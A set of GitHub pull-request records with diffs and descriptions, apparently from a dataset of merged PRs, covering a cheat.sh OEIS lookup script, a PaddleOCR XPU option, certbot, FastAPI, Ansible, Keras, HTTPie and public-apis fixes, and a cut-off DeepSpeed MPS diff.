+ local MAX_TERMS_SHORT=10
mkdir -p $TMP
- # -- get_desc --
- # @return print description of OEIS sequence
- get_desc() {
- grep -A 1 '<td valign=top align=left>' $DOC \
- | sed '/<td valign=top align=left>/d; /--/d; s/^[ \t]*//; s/<[^>]*>//g;' \
- | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g'
- return $?
- }
- # -- get_seq --
- # @param MAX_TERMS
- # @return Print the first MAX_TERMS terms of a sequence
- get_seq() {
- local MAX_TERMS=${1}
- grep -o '<tt>.*, .*[0-9]</tt>' $DOC \
- | sed 's/<[^>]*>//g' \
- | grep -v '[a-z]' \
- | grep -v ':' \
- | cut -d ',' -f 1-${MAX_TERMS}
- return $?
- }
- # -- parse_code --
- # @param GREP_REGEX
- # @return Code snippet that corresponds to GREP_REGEX
- parse_code() {
- local GREP_REGEX="${1}"
- cat $DOC \
- | tr '\n' '`' \
- | grep -o "${GREP_REGEX}" \
- | tr '`' '\n' \
- | sed 's/^[ \t]*//; s/<[^>]*>//g; /^\s*$/d;' \
- | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g'
- return $?
- }
+ rm -f ${TMP}/authors ${TMP}/bibliograpy ${TMP}/section $TMP/code_snippet
# -- MAIN --
# Search sequence by ID (optional language arg)
# . oeis <SEQ_ID>
- # . oeis <SEQ_ID> <LANGUAGE>
- # . oeis <LANGUAGE> <SEQ_ID>
+ # . oeis <SEQ_ID> <SECTION>
+ # . oeis <SECTION> <SEQ_ID>
isNum='^[0-9]+$'
- if [ $# -lt 3 ] && [[ ${1:1} =~ $isNum || ${2:1} =~ $isNum || ${1} =~ $isNum || ${2} =~ $isNum ]] && ! echo $1 | grep -q '[0-9]' || ! echo $2 | grep -q '[0-9]'
+ # Search for specific sequence (and potentially language or :SECTION (list)
+ if [ $# -ge 1 ] \
+ && [[ $(echo $1 | tr -d 'aA') =~ $isNum || $(echo $2 | tr -d 'aA') =~ $isNum ]] \
+ && [[ ! $(echo $1 | tr -d 'aA') =~ $isNum || ! $(echo $2 | tr -d 'aA') =~ $isNum ]]
then
# Arg-Parse ID, Generate URL
- if echo ${1^^} | grep -q '[B-Z]'
+ if [[ $(echo $1 | tr -d 'aA') =~ $isNum ]]
then
- ID=${2^^}
- LANGUAGE=$1
- else
ID=${1^^}
- LANGUAGE=$2
+ SECTION=$2
+ else
+ ID=${2^^}
+ SECTION=$1
fi
[[ ${ID:0:1} == 'A' ]] && ID=${ID:1}
ID=$(bc <<< "$ID")
ID="A$(printf '%06d' ${ID})"
- URL+="/${ID}"
+ URL+="id:${ID}&fmt=text"
curl $URL 2>/dev/null > $DOC
- # Print Code Sample
- if [[ ${LANGUAGE^^} == ':LIST' ]]
+ # :list available language code_snippets
+ if [[ ${SECTION^^} == ':LIST' || ${SECTION^^} == ':PROG' ]]
then
- rm -f ${TMP}/list
- grep -q 'MAPLE' $DOC && printf 'maple\n' >> $TMP/list
- grep -q 'MATHEMATICA' $DOC && printf 'mathematica\n' >> $TMP/list
- parse_code 'PROG.*CROSSREFS' \
- | grep -o '^(.*)' \
- | sed 's/ .*//g' \
- | tr -d '()' \
- | sort -u >> $TMP/list
- [ $(wc -c < $TMP/list) -ne 0 ] && cat ${TMP}/list || printf 'No code snippets available.\n'
+ grep -q '%p' $DOC && echo 'maple' >> $TMP/section
+ grep -q '%t' $DOC && echo 'mathematica' >> $TMP/section
+ grep '%o' $DOC \
+ | grep "${ID} (" \
+ | sed "s/^.*${ID} (//; s/).*//" \
+ | awk 'NF == 1' \
+ >> $TMP/section
+ [[ -f $TMP/section && $(wc -c < $TMP/section) -ne 0 ]] \
+ && cat ${TMP}/section | sort -u \
+ || printf 'No code snippets available.\n'
return 0
fi
- # Print ID, description, and sequence
+ # Print ID
printf "ID: ${ID}\n"
- get_desc
- printf '\n'
- get_seq ${MAX_TERMS}
+ # Print Description (%N)
+ grep '%N' $DOC | sed "s/^.*${ID} //"
printf '\n'
+ # Print Sequence (Three sections %S %T nd %U)
+ grep '%S' $DOC | sed "s/^.*${ID} //" | tr -d '\n' > $TMP/seq
+ grep '%T' $DOC | sed "s/^.*${ID} //" | tr -d '\n' >> $TMP/seq
+ grep '%U' $DOC | sed "s/^.*${ID} //" | tr -d '\n' >> $TMP/seq
+ cat $TMP/seq \
+ | cut -d ',' -f 1-${MAX_TERMS_LONG} \
+ | sed 's/,/, /g; s/$/ .../'
+ # Generate code snippet (%p, %t, %o) (maple, mathematica, prog sections)
if [ $# -gt 1 ]
then
- if [[ ${LANGUAGE^^} == 'MAPLE' ]] && grep -q 'MAPLE' $DOC
+ printf "\n\n"
+ # MAPLE section (%p)
+ if [[ ${SECTION^^} == 'MAPLE' ]] && grep -q '%p' $DOC
then
- GREP_REGEX='MAPLE.*CROSSREFS'
- grep -q 'PROG' $DOC && GREP_REGEX='MAPLE.*PROG'
- grep -q 'MATHEMATICA' $DOC && GREP_REGEX='MAPLE.*MATHEMATICA'
- parse_code "${GREP_REGEX}" \
- | sed 's/MAPLE/(MAPLE)/; /MATHEMATICA/d; /PROG/d; /CROSSREFS/d' \
- > ${TMP}/code_snippet
- elif [[ ${LANGUAGE^^} == 'MATHEMATICA' ]] && grep -q 'MATHEMATICA' $DOC
+ grep '%p' $DOC | sed "s/^.*${ID} //" > $TMP/code_snippet
+ # MATHEMATICA section (%t)
+ elif [[ ${SECTION^^} == 'MATHEMATICA' ]] && grep -q '%t' $DOC
+ then
+ grep '%t' $DOC | sed "s/^.*${ID} //" > $TMP/code_snippet
+ # PROG section (%o)
+ elif grep -qi '%o' $DOC && grep -qi $SECTION $DOC
then
- GREP_REGEX='MATHEMATICA.*CROSSREFS'
- grep -q 'PROG' $DOC && GREP_REGEX='MATHEMATICA.*PROG'
- parse_code "${GREP_REGEX}" \
- | sed 's/MATHEMATICA/(MATHEMATICA)/; /PROG/d; /CROSSREFS/d' \
- > ${TMP}/code_snippet
- else
- # PROG section contains more code samples (Non Mathematica or Maple)
- parse_code 'PROG.*CROSSREFS' \
- | sed '/PROG/d; /CROSSREFS/d' \
- > ${TMP}/prog
# Print out code sample for specified language
- rm -f ${TMP}/code_snippet
- awk -v tgt="${LANGUAGE^^}" -F'[()]' '/^\(/{f=(tgt==toupper($2))} f' ${TMP}/prog > ${TMP}/code_snippet
+ grep '%o' $DOC \
+ | sed "s/%o ${ID} //" \
+ | awk -v tgt="${SECTION^^}" -F'[()]' '{act=$2} sub(/^\([^()]+\) */,""){f=(tgt==toupper(act))} f' \
+ > ${TMP}/code_snippet
fi
# Print code snippet with 4-space indent to enable colorization
- if [ $(wc -c < $TMP/code_snippet) -ne 0 ]
+ if [[ -f $TMP/code_snippet && $(wc -c < $TMP/code_snippet) -ne 0 ]]
then
- printf "${LANGUAGE}"
+ # Get authors
+ cat ${TMP}/code_snippet \
+ | grep -o ' _[A-Z].* [A-Z].*_, [A-Z].*[0-9]' \
+ | sort -u \
+ > ${TMP}/authors
+ i=1
+ # Replace authors with numbers
+ while read author
+ do
+ author=$(<<<"$author" sed 's/[]\\\*\(\.[]/\\&/g')
+ sed -i "s|${author}|[${i}]|" ${TMP}/code_snippet
+ echo "[${i}] [${author}]" | tr -d '_' >> ${TMP}/bibliograpy
+ let i++
+ done <${TMP}/authors
+ # Print snippet
cat ${TMP}/code_snippet \
- | sed "s/(${LANGUAGE^^})/\n/; s/(${LANGUAGE})/\n/;" \
| sed 's/^/ /'
else
- printf "${LANGUAGE^^} unavailable. Use :list to view available languages.\n"
+ printf "${SECTION^^} unavailable. Use :list to view available languages.\n"
fi
fi
# Search unknown sequence
- else
+ elif [ $# -gt 1 ] && ! echo $@ | grep -q -e [a-z] -e [A-Z]
+ then
# Build URL
- URL+="/search?q=signed:$(echo $@ | tr -sc '[:digit:]-' ',')"
+ URL+="signed:$(echo $@ | tr -sc '[:digit:]-' ',')&fmt=short"
curl $URL 2>/dev/null > $DOC
# Sequence IDs
- grep -o '=id:.*&' $DOC \
- | sed 's/=id://; s/&//' > $TMP/id
- # Descriptions
- get_desc > $TMP/desc
- # Sequences
- get_seq ${MAX_TERMS} > $TMP/seq
- # Print data for all
+ grep -o '"/A[0-9][0-9][0-9][0-9][0-9][0-9]">A[0-9][0-9][0-9][0-9][0-9][0-9]' $DOC \
+ | sed 's/.*>//' \
+ > $TMP/id
readarray -t ID < $TMP/id
+ # Descriptions
+ grep -A 1 '<td valign=top align=left>' $DOC \
+ | sed '/--/d; s/<[^>]*>//g; /^\s*$/d; s/^[ \t]*//' \
+ | sed 's/ / /g; s/\&/\&/g; s/>/>/g; s/</</g; s/"/"/g' \
+ > $TMP/desc
readarray -t DESC < $TMP/desc
+ # Sequences
+ grep 'style="color:black;font-size:120%' $DOC \
+ | sed 's/<[^>]*>//g; s/^[ \t]*//' \
+ | cut -d ',' -f 1-${MAX_TERMS_SHORT} \
+ | sed 's/,/, /g; s/$/ .../' \
+ > $TMP/seq
readarray -t SEQ < $TMP/seq
+ # Print all ID, DESC, SEQ
for i in ${!ID[@]}
do
printf "${ID[$i]}: ${DESC[$i]}\n"
printf "${SEQ[$i]}\n\n"
done
+ else
+ printf "
+# oeis
+#
+# The On-Line Encyclopedia of Integer Sequences (OEIS),
+# also cited simply as Sloane's, is an online database of integer sequences.
+
+# Find all possible OEIS sequences for some sequence (1,1,1,1...)
+curl cheat.sh/oeis/1+1+1+1
+
+# Describe an OEIS sequence (A2)
+curl cheat.sh/oeis/A2
+
+# Implementation of the A2 OEIS sequence in Python
+curl cheat.sh/oeis/A2/python
+
+# List all available implementations of the A2 OEIS sequence
+curl cheat.sh/oeis/A2/:list
+"
+ return 1
fi
- grep 'results, too many to show. Please refine your search.' /tmp/oeis/doc.html | sed -e 's/<[^>]*>//g; s/^[ \t]*//'
+ # Error statements
+ grep 'results, too many to show. Please refine your search.' $DOC | sed -e 's/<[^>]*>//g; s/^[ \t]*//'
+ grep -o 'Sorry, but the terms do not match anything in the table.' $DOC
+ # print bibliography
+ printf "\n\n"
+ [ -f ${TMP}/bibliograpy ] && cat ${TMP}/bibliograpy
# Print URL for user
- printf "\n[${URL}]\n" | rev | sed 's/,//' | rev
+ printf "[${URL}]\n" \
+ | rev \
+ | sed 's/,//' \
+ | rev \
+ | sed 's/&.*/]/'
)
oeis $@
| #187 | https://api.github.com/repos/chubin/cheat.sh/pulls/215 | 2020-06-27T17:28:03Z | 2020-07-02T19:38:26Z | 2020-07-02T19:38:26Z | 2020-07-06T04:40:40Z | 3,630 | chubin/cheat.sh | 15,189 |
add use_xpu config for det_mv3_db.yml | diff --git a/configs/det/det_mv3_db.yml b/configs/det/det_mv3_db.yml
index 1fab509d12..6edf0b9194 100644
--- a/configs/det/det_mv3_db.yml
+++ b/configs/det/det_mv3_db.yml
@@ -1,5 +1,6 @@
Global:
use_gpu: true
+ use_xpu: false
epoch_num: 1200
log_smooth_window: 20
print_batch_step: 10
diff --git a/tools/program.py b/tools/program.py
index c5b0e69b2d..e92bef3300 100755
--- a/tools/program.py
+++ b/tools/program.py
@@ -130,6 +130,25 @@ def check_gpu(use_gpu):
pass
+def check_xpu(use_xpu):
+ """
+ Log error and exit when set use_xpu=true in paddlepaddle
+ cpu/gpu version.
+ """
+ err = "Config use_xpu cannot be set as true while you are " \
+ "using paddlepaddle cpu/gpu version ! \nPlease try: \n" \
+ "\t1. Install paddlepaddle-xpu to run model on XPU \n" \
+ "\t2. Set use_xpu as false in config file to run " \
+ "model on CPU/GPU"
+
+ try:
+ if use_xpu and not paddle.is_compiled_with_xpu():
+ print(err)
+ sys.exit(1)
+ except Exception as e:
+ pass
+
+
def train(config,
train_dataloader,
valid_dataloader,
@@ -512,6 +531,12 @@ def preprocess(is_train=False):
use_gpu = config['Global']['use_gpu']
check_gpu(use_gpu)
+ # check if set use_xpu=True in paddlepaddle cpu/gpu version
+ use_xpu = False
+ if 'use_xpu' in config['Global']:
+ use_xpu = config['Global']['use_xpu']
+ check_xpu(use_xpu)
+
alg = config['Architecture']['algorithm']
assert alg in [
'EAST', 'DB', 'SAST', 'Rosetta', 'CRNN', 'STARNet', 'RARE', 'SRN',
@@ -519,7 +544,11 @@ def preprocess(is_train=False):
'SEED', 'SDMGR', 'LayoutXLM', 'LayoutLM'
]
- device = 'gpu:{}'.format(dist.ParallelEnv().dev_id) if use_gpu else 'cpu'
+ device = 'cpu'
+ if use_gpu:
+ device = 'gpu:{}'.format(dist.ParallelEnv().dev_id)
+ if use_xpu:
+ device = 'xpu'
device = paddle.set_device(device)
config['Global']['distributed'] = dist.get_world_size() != 1
| https://api.github.com/repos/PaddlePaddle/PaddleOCR/pulls/5549 | 2022-02-23T08:37:42Z | 2022-02-23T11:05:52Z | 2022-02-23T11:05:52Z | 2022-02-23T11:05:52Z | 656 | PaddlePaddle/PaddleOCR | 41,799 |
|
Fix ubuntu package name in INSTALL.rst | diff --git a/certbot/docs/install.rst b/certbot/docs/install.rst
index 4366080e0d3..8ae1c82f2e9 100644
--- a/certbot/docs/install.rst
+++ b/certbot/docs/install.rst
@@ -191,7 +191,7 @@ Optionally to install the Certbot Apache plugin, you can use:
.. code-block:: shell
- sudo apt-get install python-certbot-apache
+ sudo apt-get install python3-certbot-apache
**Fedora**
| Since Ubuntu 18.04 there has been `python3-certbot-apache`, which should be the recommended package.
The package `python-certbot-apache` has no installation candidate on 20.04.
The Debian package names should probably be updated accordingly.
## Pull Request Checklist
- [ ] If the change being made is to a [distributed component](https://certbot.eff.org/docs/contributing.html#code-components-and-layout), edit the `master` section of `certbot/CHANGELOG.md` to include a description of the change being made.
- [X] Add or update any documentation as needed to support the changes in this PR.
It *is* updating the docs :-)
- [ ] Include your name in `AUTHORS.md` if you like.
Not needed. | https://api.github.com/repos/certbot/certbot/pulls/8654 | 2021-02-09T16:55:37Z | 2021-02-09T20:18:30Z | 2021-02-09T20:18:30Z | 2021-02-09T20:18:30Z | 124 | certbot/certbot | 2,113 |
🌐 Add Russian translation for `docs/ru/docs/contributing.md` | diff --git a/docs/ru/docs/contributing.md b/docs/ru/docs/contributing.md
index cb460beb0779c..f61ef1cb648a7 100644
--- a/docs/ru/docs/contributing.md
+++ b/docs/ru/docs/contributing.md
@@ -82,7 +82,7 @@ $ python -m venv env
</div>
-Ели в терминале появится ответ, что бинарник `pip` расположен по пути `.../env/bin/pip`, значит всё в порядке. 🎉
+Если в терминале появится ответ, что бинарник `pip` расположен по пути `.../env/bin/pip`, значит всё в порядке. 🎉
Во избежание ошибок в дальнейших шагах, удостоверьтесь, что в Вашем виртуальном окружении установлена последняя версия `pip`:
diff --git a/docs/ru/docs/tutorial/extra-data-types.md b/docs/ru/docs/tutorial/extra-data-types.md
new file mode 100644
index 0000000000000..efcbcb38a2390
--- /dev/null
+++ b/docs/ru/docs/tutorial/extra-data-types.md
@@ -0,0 +1,82 @@
+# Дополнительные типы данных
+
+До сих пор вы использовали простые типы данных, такие как:
+
+* `int`
+* `float`
+* `str`
+* `bool`
+
+Но вы также можете использовать и более сложные типы.
+
+При этом у вас останутся те же возможности , что и до сих пор:
+
+* Отличная поддержка редактора.
+* Преобразование данных из входящих запросов.
+* Преобразование данных для ответа.
+* Валидация данных.
+* Автоматическая аннотация и документация.
+
+## Другие типы данных
+
+Ниже перечислены некоторые из дополнительных типов данных, которые вы можете использовать:
+
+* `UUID`:
+ * Стандартный "Универсальный уникальный идентификатор", используемый в качестве идентификатора во многих базах данных и системах.
+ * В запросах и ответах будет представлен как `str`.
+* `datetime.datetime`:
+ * Встроенный в Python `datetime.datetime`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `2008-09-15T15:53:00+05:00`.
+* `datetime.date`:
+ * Встроенный в Python `datetime.date`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `2008-09-15`.
+* `datetime.time`:
+ * Встроенный в Python `datetime.time`.
+ * В запросах и ответах будет представлен как `str` в формате ISO 8601, например: `14:23:55.003`.
+* `datetime.timedelta`:
+ * Встроенный в Python `datetime.timedelta`.
+ * В запросах и ответах будет представлен в виде общего количества секунд типа `float`.
+ * Pydantic также позволяет представить его как "Кодировку разницы во времени ISO 8601", <a href="https://pydantic-docs.helpmanual.io/usage/exporting_models/#json_encoders" class="external-link" target="_blank">см. документацию для получения дополнительной информации</a>.
+* `frozenset`:
+ * В запросах и ответах обрабатывается так же, как и `set`:
+ * В запросах будет прочитан список, исключены дубликаты и преобразован в `set`.
+ * В ответах `set` будет преобразован в `list`.
+ * В сгенерированной схеме будет указано, что значения `set` уникальны (с помощью JSON-схемы `uniqueItems`).
+* `bytes`:
+ * Встроенный в Python `bytes`.
+ * В запросах и ответах будет рассматриваться как `str`.
+ * В сгенерированной схеме будет указано, что это `str` в формате `binary`.
+* `Decimal`:
+ * Встроенный в Python `Decimal`.
+ * В запросах и ответах обрабатывается так же, как и `float`.
+* Вы можете проверить все допустимые типы данных pydantic здесь: <a href="https://pydantic-docs.helpmanual.io/usage/types" class="external-link" target="_blank">Типы данных Pydantic</a>.
+
+## Пример
+
+Вот пример *операции пути* с параметрами, который демонстрирует некоторые из вышеперечисленных типов.
+
+=== "Python 3.6 и выше"
+
+ ```Python hl_lines="1 3 12-16"
+ {!> ../../../docs_src/extra_data_types/tutorial001.py!}
+ ```
+
+=== "Python 3.10 и выше"
+
+ ```Python hl_lines="1 2 11-15"
+ {!> ../../../docs_src/extra_data_types/tutorial001_py310.py!}
+ ```
+
+Обратите внимание, что параметры внутри функции имеют свой естественный тип данных, и вы, например, можете выполнять обычные манипуляции с датами, такие как:
+
+=== "Python 3.6 и выше"
+
+ ```Python hl_lines="18-19"
+ {!> ../../../docs_src/extra_data_types/tutorial001.py!}
+ ```
+
+=== "Python 3.10 и выше"
+
+ ```Python hl_lines="17-18"
+ {!> ../../../docs_src/extra_data_types/tutorial001_py310.py!}
+ ```
diff --git a/docs/ru/mkdocs.yml b/docs/ru/mkdocs.yml
index 808479198aa2d..fc3ca0c81bc5b 100644
--- a/docs/ru/mkdocs.yml
+++ b/docs/ru/mkdocs.yml
@@ -67,6 +67,7 @@ nav:
- Учебник - руководство пользователя:
- tutorial/body-fields.md
- tutorial/background-tasks.md
+ - tutorial/extra-data-types.md
- tutorial/cookie-params.md
- async.md
- Развёртывание:
| ## Pull Request Description
This change adds a Russian translation for the `docs/ru/docs/tutorial/extra-data-types.md` page and fixes a typo in `docs/ru/docs/contributing.md`.
### Changes In This Pull Request
* Created a new file `extra-data-types.md` for the translation
* Updated `mkdocs.yml` to contain the newly added file
* Fixed small typo in `docs/ru/docs/contributing.md` | https://api.github.com/repos/tiangolo/fastapi/pulls/6002 | 2023-02-15T10:33:20Z | 2023-04-13T18:04:30Z | 2023-04-13T18:04:30Z | 2023-04-13T18:04:31Z | 1,486 | tiangolo/fastapi | 23,231 |
nxos_evpn_global refactor | diff --git a/lib/ansible/modules/network/nxos/nxos_evpn_global.py b/lib/ansible/modules/network/nxos/nxos_evpn_global.py
index 8dacf77d5c46d1..6f6b826678b5fd 100644
--- a/lib/ansible/modules/network/nxos/nxos_evpn_global.py
+++ b/lib/ansible/modules/network/nxos/nxos_evpn_global.py
@@ -16,10 +16,11 @@
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
-ANSIBLE_METADATA = {'metadata_version': '1.0',
- 'status': ['preview'],
- 'supported_by': 'community'}
-
+ANSIBLE_METADATA = {
+ 'metadata_version': '1.0',
+ 'status': ['preview'],
+ 'supported_by': 'community'
+}
DOCUMENTATION = '''
---
@@ -50,11 +51,13 @@
type: list
sample: ['nv overlay evpn']
'''
+
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.nxos import get_config, load_config
from ansible.module_utils.nxos import nxos_argument_spec
from ansible.module_utils.nxos import check_args as nxos_check_args
+
def check_args(module, warnings):
nxos_check_args(module, warnings)
@@ -62,6 +65,7 @@ def check_args(module, warnings):
if module.params[key] is not None:
warnings.append('argument %s is no longer supported, ignoring value' % key)
+
def main():
argument_spec = dict(
nv_overlay_evpn=dict(required=True, type='bool'),
@@ -74,8 +78,7 @@ def main():
argument_spec.update(nxos_argument_spec)
- module = AnsibleModule(argument_spec=argument_spec,
- supports_check_mode=True)
+ module = AnsibleModule(argument_spec=argument_spec, supports_check_mode=True)
result = {'changed': False}
@@ -105,4 +108,3 @@ def main():
if __name__ == '__main__':
main()
-
diff --git a/test/sanity/pep8/legacy-files.txt b/test/sanity/pep8/legacy-files.txt
index 3ae817df94bd9c..cf94c6912ad03b 100644
--- a/test/sanity/pep8/legacy-files.txt
+++ b/test/sanity/pep8/legacy-files.txt
@@ -467,7 +467,6 @@ lib/ansible/modules/network/nxos/nxos_aaa_server_host.py
lib/ansible/modules/network/nxos/nxos_bgp_neighbor_af.py
lib/ansible/modules/network/nxos/nxos_command.py
lib/ansible/modules/network/nxos/nxos_config.py
-lib/ansible/modules/network/nxos/nxos_evpn_global.py
lib/ansible/modules/network/nxos/nxos_facts.py
lib/ansible/modules/network/nxos/nxos_feature.py
lib/ansible/modules/network/nxos/nxos_gir.py
| Signed-off-by: Trishna Guha <trishnaguha17@gmail.com>
##### SUMMARY
nxos_evpn_global minor refactor to make sure the module runs without crashing.
##### ISSUE TYPE
- Bugfix Pull Request
- Docs Pull Request
##### COMPONENT NAME
modules/network/nxos/nxos_evpn_global
##### ANSIBLE VERSION
```
devel 2.4
``` | https://api.github.com/repos/ansible/ansible/pulls/24919 | 2017-05-23T07:50:15Z | 2017-05-23T09:24:55Z | 2017-05-23T09:24:55Z | 2019-04-26T21:22:01Z | 679 | ansible/ansible | 48,769 |
Added AdoptAPet Api | diff --git a/README.md b/README.md
index feb1884bd4..33c5eac2cf 100644
--- a/README.md
+++ b/README.md
@@ -106,6 +106,7 @@
### Animals
API | Description | Auth | HTTPS | CORS |
|---|---|---|---|---|
+| [AdoptAPet](https://www.adoptapet.com/public/apis/pet_list.html) | Resource to help get pets adopted | `apiKey` | Yes | Yes |
| [Axolotl](https://theaxolotlapi.netlify.app/) | Collection of axolotl pictures and facts | No | Yes | Yes |
| [Cat Facts](https://alexwohlbruck.github.io/cat-facts/) | Daily cat facts | No | Yes | No |
| [Cataas](https://cataas.com/) | Cat as a service (cats pictures and gifs) | No | Yes | No |
| Add AdoptAPet API to Animals
- [x] My submission is formatted according to the guidelines in the [contributing guide](/CONTRIBUTING.md)
- [x] My addition is ordered alphabetically
- [x] My submission has a useful description
- [x] The description does not have more than 100 characters
- [x] The description does not end with punctuation
- [x] Each table column is padded with one space on either side
- [x] I have searched the repository for any relevant issues or pull requests
- [x] Any category I am creating has the minimum requirement of 3 items
- [x] All changes have been [squashed][squash-link] into a single commit
[squash-link]: <https://github.com/todotxt/todo.txt-android/wiki/Squash-All-Commits-Related-to-a-Single-Issue-into-a-Single-Commit>
| https://api.github.com/repos/public-apis/public-apis/pulls/2713 | 2021-10-25T15:20:15Z | 2021-10-28T17:25:04Z | 2021-10-28T17:25:04Z | 2021-10-28T17:25:05Z | 213 | public-apis/public-apis | 35,320 |
Fix encoding error | diff --git a/docs/autogen.py b/docs/autogen.py
index 22964a17a26..d6f8b4bff65 100644
--- a/docs/autogen.py
+++ b/docs/autogen.py
@@ -269,7 +269,7 @@ def add_np_implementation(function, docstring):
def read_file(path):
- with open(path) as f:
+ with open(path, encoding='utf-8') as f:
return f.read()
@@ -326,7 +326,7 @@ def get_module_docstring(filepath):
Also finds the line at which the docstring ends.
"""
- co = compile(open(filepath).read(), filepath, 'exec')
+ co = compile(open(filepath, encoding='utf-8').read(), filepath, 'exec')
if co.co_consts and isinstance(co.co_consts[0], six.string_types):
docstring = co.co_consts[0]
else:
@@ -347,8 +347,9 @@ def copy_examples(examples_dir, destination_dir):
module_path = os.path.join(examples_dir, file)
docstring, starting_line = get_module_docstring(module_path)
destination_file = os.path.join(destination_dir, file[:-2] + 'md')
- with open(destination_file, 'w+') as f_out, \
- open(os.path.join(examples_dir, file), 'r+') as f_in:
+ with open(destination_file, 'w+', encoding='utf-8') as f_out, \
+ open(os.path.join(examples_dir, file),
+ 'r+', encoding='utf-8') as f_in:
f_out.write(docstring + '\n\n')
@@ -391,7 +392,7 @@ def generate(sources_dir):
readme = read_file(os.path.join(str(keras_dir), 'README.md'))
index = read_file(os.path.join(template_dir, 'index.md'))
index = index.replace('{{autogenerated}}', readme[readme.find('##'):])
- with open(os.path.join(sources_dir, 'index.md'), 'w') as f:
+ with open(os.path.join(sources_dir, 'index.md'), 'w', encoding='utf-8') as f:
f.write(index)
print('Generating docs for Keras %s.' % keras.__version__)
@@ -457,7 +458,7 @@ def generate(sources_dir):
subdir = os.path.dirname(path)
if not os.path.exists(subdir):
os.makedirs(subdir)
- with open(path, 'w') as f:
+ with open(path, 'w', encoding='utf-8') as f:
f.write(mkdown)
shutil.copyfile(os.path.join(str(keras_dir), 'CONTRIBUTING.md'),
|
### Summary
Running `autogen.py` on Windows fails with the following error:
`UnicodeDecodeError: 'cp949' codec can't decode byte 0xbf in position 2: illegal multibyte sequence`
Passing the `utf-8` encoding argument to the affected `open()` calls fixes the error.
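A minimal sketch of the fix (the path is hypothetical; only the `encoding` argument matters):

```python
# Without an explicit encoding, open() uses the locale's default codec
# (cp949 on Korean Windows), which fails on UTF-8 bytes such as 0xbf.
with open("docs/templates/index.md", encoding="utf-8") as f:  # hypothetical path
    text = f.read()  # decodes the same way on every platform
```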
### Related Issues
### PR Overview
- [n] This PR requires new unit tests [y/n] (make sure tests are included)
- [n] This PR requires to update the documentation [y/n] (make sure the docs are up-to-date)
- [y] This PR is backwards compatible [y/n]
- [n] This PR changes the current API [y/n] (all API changes need to be approved by fchollet)
| https://api.github.com/repos/keras-team/keras/pulls/13355 | 2019-09-23T08:42:06Z | 2019-09-25T21:52:14Z | 2019-09-25T21:52:14Z | 2019-09-26T08:18:27Z | 601 | keras-team/keras | 47,525 |
fix issue with parsing renewal confs | diff --git a/letsencrypt/renewer.py b/letsencrypt/renewer.py
index 0a490d44752..8f7f38c90e0 100644
--- a/letsencrypt/renewer.py
+++ b/letsencrypt/renewer.py
@@ -179,7 +179,9 @@ def main(cli_args=sys.argv[1:]):
# RenewableCert object for this cert at all, which could
# dramatically improve performance for large deployments
# where autorenewal is widely turned off.
- cert = storage.RenewableCert(renewal_file, cli_config)
+ cert = storage.RenewableCert(
+ os.path.join(cli_config.renewal_configs_dir, renewal_file),
+ cli_config)
except errors.CertStorageError:
# This indicates an invalid renewal configuration file, such
# as one missing a required parameter (in the future, perhaps
diff --git a/letsencrypt/storage.py b/letsencrypt/storage.py
index 7e2802b146a..5186cd945a5 100644
--- a/letsencrypt/storage.py
+++ b/letsencrypt/storage.py
@@ -260,7 +260,7 @@ def current_target(self, kind):
:returns: The path to the current version of the specified
member.
- :rtype: str
+ :rtype: str or None
"""
if kind not in ALL_FOUR:
diff --git a/letsencrypt/tests/renewer_test.py b/letsencrypt/tests/renewer_test.py
index daec9678f68..d583e864575 100644
--- a/letsencrypt/tests/renewer_test.py
+++ b/letsencrypt/tests/renewer_test.py
@@ -764,6 +764,8 @@ def test_main(self, mock_renew, mock_rc, mock_notify):
def test_bad_config_file(self):
from letsencrypt import renewer
+ os.unlink(os.path.join(self.cli_config.renewal_configs_dir,
+ "example.org.conf"))
with open(os.path.join(self.cli_config.renewal_configs_dir,
"bad.conf"), "w") as f:
f.write("incomplete = configfile\n")
| Previously it only passed the name of the config file, which prevented the following code from opening it. Now we pass the full path (a quick sketch below).
Split the statement across multiple lines for linting.
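A quick sketch of the difference (illustrative values, not code from this PR):

```python
import os

renewal_configs_dir = "/etc/letsencrypt/renewal"  # illustrative value
renewal_file = "example.org.conf"

# Before: only the bare file name reached RenewableCert, so opening it
# failed unless the process happened to run from the config directory.
broken_path = renewal_file

# After: the full path is built before constructing RenewableCert.
fixed_path = os.path.join(renewal_configs_dir, renewal_file)
print(fixed_path)  # /etc/letsencrypt/renewal/example.org.conf
```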
| https://api.github.com/repos/certbot/certbot/pulls/1929 | 2015-12-17T03:08:48Z | 2015-12-18T19:41:44Z | 2015-12-18T19:41:44Z | 2016-05-06T19:22:01Z | 487 | certbot/certbot | 1,187 |
Update Requests documentation links | diff --git a/docs/README.md b/docs/README.md
index 41ed503006..7dbdaf11b8 100644
--- a/docs/README.md
+++ b/docs/README.md
@@ -1453,7 +1453,8 @@ $ http --proxy=http:http://user:pass@10.10.1.10:3128 example.org
### Environment variables
-You can also configure proxies by environment variables `ALL_PROXY`, `HTTP_PROXY` and `HTTPS_PROXY`, and the underlying [Requests library](https://python-requests.org/) will pick them up.
+You can also configure proxies by environment variables `ALL_PROXY`, `HTTP_PROXY` and `HTTPS_PROXY`, and the underlying
+[Requests library](https://requests.readthedocs.io/en/latest/) will pick them up.
If you want to disable proxies configured through the environment variables for certain hosts, you can specify them in `NO_PROXY`.
In your `~/.bash_profile`:
@@ -2553,7 +2554,7 @@ HTTPie has the following community channels:
Under the hood, HTTPie uses these two amazing libraries:
-- [Requests](https://python-requests.org) — Python HTTP library for humans
+- [Requests](https://requests.readthedocs.io/en/latest/) — Python HTTP library for humans
- [Pygments](https://pygments.org/) — Python syntax highlighter
#### HTTPie friends
| This is a quick follow-up from psf/requests#6140. This PR fixes the dead link by moving it to https://requests.readthedocs.io/en/latest/, which will be the primary domain for the project going forward. | https://api.github.com/repos/httpie/cli/pulls/1414 | 2022-06-17T19:13:40Z | 2022-06-17T21:04:43Z | 2022-06-17T21:04:42Z | 2022-06-17T21:05:55Z | 301 | httpie/cli | 33,757 |
add missing methods to MPS_Accelerator | diff --git a/accelerator/mps_accelerator.py b/accelerator/mps_accelerator.py
index f6303cf9890f..972b33caece1 100644
--- a/accelerator/mps_accelerator.py
+++ b/accelerator/mps_accelerator.py
@@ -24,6 +24,15 @@ def __init__(self):
